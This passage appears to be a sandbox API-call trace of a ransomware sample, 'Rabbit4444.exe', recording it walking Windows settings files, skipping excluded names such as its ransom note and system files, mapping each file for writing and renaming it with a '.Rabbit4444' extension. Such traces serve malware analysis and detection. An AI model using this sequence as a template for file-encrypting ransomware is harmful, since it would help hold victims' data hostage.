[0057.403] lstrlenW (lpString=".sys") returned 4 [0057.403] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.403] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_zoomenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.403] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.403] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14871379279) returned 1 [0057.403] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1255) returned 1 [0057.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.403] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.404] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.405] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.405] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.405] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.405] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.405] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.405] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.405] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.405] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.405] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14871624419) returned 1 [0057.406] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.406] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.406] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.406] CloseHandle (hObject=0x298) returned 1 [0057.406] CloseHandle (hObject=0x278) returned 1 [0057.406] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms.Rabbit4444") returned 188 [0057.406] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_zoomenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_zoomenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.406] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cf6dac7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2cf6dac7, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x515, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", cAlternateFileName="AAEFA7~1.SET")) returned 1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.407] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.407] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms") returned="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms" [0057.407] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.407] lstrlenW (lpString="AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms") returned 69 [0057.407] lstrlenW (lpString="Rabbit4444") returned 10 [0057.407] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.407] lstrlenW (lpString=".dll") returned 4 [0057.407] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.407] lstrlenW (lpString=".lnk") returned 4 [0057.407] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.407] lstrlenW (lpString=".ini") returned 4 [0057.407] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.407] lstrlenW (lpString=".sys") returned 4 [0057.407] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.408] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isautocorrectionenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.408] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.408] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14871866218) returned 1 [0057.408] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1301) returned 1 [0057.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.408] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0057.408] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.409] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.410] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.410] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14872110364) returned 1 [0057.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0057.410] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.411] CloseHandle (hObject=0x298) returned 1 [0057.411] CloseHandle (hObject=0x278) returned 1 [0057.411] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms.Rabbit4444") returned 197 [0057.411] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isautocorrectionenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isautocorrectionenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.412] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d1d009d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2d1d009d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x51d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", cAlternateFileName="AA9BCB~1.SET")) returned 1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.412] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.412] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms") returned="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms" [0057.412] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.412] lstrlenW (lpString="AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms") returned 70 [0057.412] lstrlenW (lpString="Rabbit4444") returned 10 [0057.412] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.412] lstrlenW (lpString=".dll") returned 4 [0057.412] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.412] lstrlenW (lpString=".lnk") returned 4 [0057.412] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.412] lstrlenW (lpString=".ini") returned 4 [0057.412] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.412] lstrlenW (lpString=".sys") returned 4 [0057.413] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.413] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isautoshiftengageenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.413] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.413] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14872357294) returned 1 [0057.413] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1309) returned 1 [0057.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0057.413] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.414] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.415] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.415] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.415] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.415] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.415] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14872625127) returned 1 [0057.416] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.416] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0057.416] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.416] CloseHandle (hObject=0x298) returned 1 [0057.416] CloseHandle (hObject=0x278) returned 1 [0057.416] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms.Rabbit4444") returned 198 [0057.416] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isautoshiftengageenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isautoshiftengageenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.417] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d301387, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2d301387, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", cAlternateFileName="AA7448~1.SET")) returned 1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.417] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.417] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms") returned="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms" [0057.417] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.417] lstrlenW (lpString="AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms") returned 76 [0057.417] lstrlenW (lpString="Rabbit4444") returned 10 [0057.417] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.417] lstrlenW (lpString=".dll") returned 4 [0057.417] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.417] lstrlenW (lpString=".lnk") returned 4 [0057.417] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.417] lstrlenW (lpString=".ini") returned 4 [0057.417] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.417] lstrlenW (lpString=".sys") returned 4 [0057.417] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.418] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_iscompatibilitykeyboardenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.418] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.418] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14872857456) returned 1 [0057.418] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1339) returned 1 [0057.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.418] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0057.418] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0057.421] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0057.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.421] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.422] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.422] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14873263370) returned 1 [0057.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.422] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0057.422] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.422] CloseHandle (hObject=0x298) returned 1 [0057.422] CloseHandle (hObject=0x278) returned 1 [0057.422] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms.Rabbit4444") returned 204 [0057.422] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms" (normalized: 